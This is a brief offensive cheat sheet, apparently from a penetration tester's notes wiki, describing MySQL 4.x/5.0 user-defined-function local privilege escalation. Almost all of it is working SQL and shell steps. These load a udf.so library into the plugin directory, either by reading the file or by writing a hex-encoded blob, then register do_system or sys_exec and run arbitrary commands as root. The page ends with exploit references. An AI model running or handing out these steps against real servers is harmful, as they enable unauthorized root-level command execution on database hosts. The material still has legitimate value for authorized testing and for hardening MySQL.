mysql exploit
MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit
Requirements
Mysql running as root
Insecure handling of files
Plugin directory knowledge
.so file download
Download from github:metasploit-framework
Method 1 (access to box):
mysql -uroot -p<PASS>
> USE mysql;
> CREATE table kashz(line blob);
> INSERT INTO kashz VALUES(load_file('/PATH/udf.so'));
> SELECT * FROM kashz INTO dumpfile '/PLUGIN-DIR/udf.so';
# create function
> CREATE FUNCTION do_system RETURNS integer soname 'udf.so';
> SELECT * from mysql.func;
# run RCE
> SELECT do_system('RCE');
Method 2 (no access no box):
Generate shellcode:
xxd -p udf.so | tr -d '\n' > udf.so.hex
> SELECT @@plugin_dir;
> SET @shell = 0x<SHELLCODE-DATA>;
> SELECT binary @shell into dumpfile 'PLUGIN-DIR/udf.so';
# create function
> CREATE FUNCTION sys_exec RETURNS int soname 'udf.so';
> SELECT * FROM mysql.func;
# run RCE
> SELECT sys_exec('RCE');
References
https://www.exploit-db.com/exploits/1518
https://github.sofianehamlaoui.fr/Security-Cheatsheets/databases/mysql/mysql-root-to-system-root/
https://gist.github.com/p0c/8587757
Last updated
Was this helpful?